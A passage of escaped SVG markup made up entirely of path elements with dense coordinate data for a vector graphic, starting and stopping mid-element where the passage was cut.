-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path 